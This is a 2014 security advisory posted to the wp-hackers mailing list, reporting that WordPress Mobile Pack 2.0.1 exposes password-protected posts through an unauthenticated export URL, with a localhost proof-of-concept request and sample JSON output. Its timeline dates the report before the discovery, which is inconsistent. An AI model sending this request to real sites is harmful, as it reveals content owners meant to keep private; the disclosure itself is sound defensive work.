[wp-hackers] Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password protected posts (WordPress plugin)
dxw Security
security at dxw.com
Wed Aug 20 10:32:29 UTC 2014
Details
================
Software: WordPress Mobile Pack
Version: 2.0.1
Homepage: http://wordpress.org/plugins/wordpress-mobile-pack/
Advisory report: https://security.dxw.com/advisories/information-disclosure-vulnerability-in-wordpress-mobile-pack-allows-anybody-to-read-password-protected-posts/
CVE: Awaiting assignment
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)
Description
================
Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password protected posts
Vulnerability
================
WordPress Mobile Pack contains a PHP file which allows anybody – authenticated or otherwise – to read all public and password protected posts (draft and private posts appear not to be affected).
Proof of concept
================
Create a password-protected post
Enable WordPress Mobile Pack
Visit http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles&callback=x
Your password-protected post is now visible to everybody in the form of JSON wrapped in “x()”
Example output:
x (
{
\"articles\": [
{
\"id\": 849,
\"title\": \"Secret post\",
\"timestamp\": 1406231170,
\"author\": \"admin\",
\"date\": \"Thu, Jul 24, 2014, 19:46\",
\"link\": \"http://wp.local/?p=849\",
\"image\": \"\",
\"description\": \"<p>HUSH THIS IS A SECRET</p>n\",
\"content\": \"\",
\"category_id\": 1,
\"category_name\": \"Uncategorized\"
}
]
}
)
Mitigations
================
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security at dxw.com to acknowledge this report if you received it via a third party (for example, plugins at wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2014-07-24: Discovered
2014-07-13: Reported to developer via email
2014-08-19: Developer reported the issue fixed
2014-08-20: Advisory published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
More information about the wp-hackers
mailing list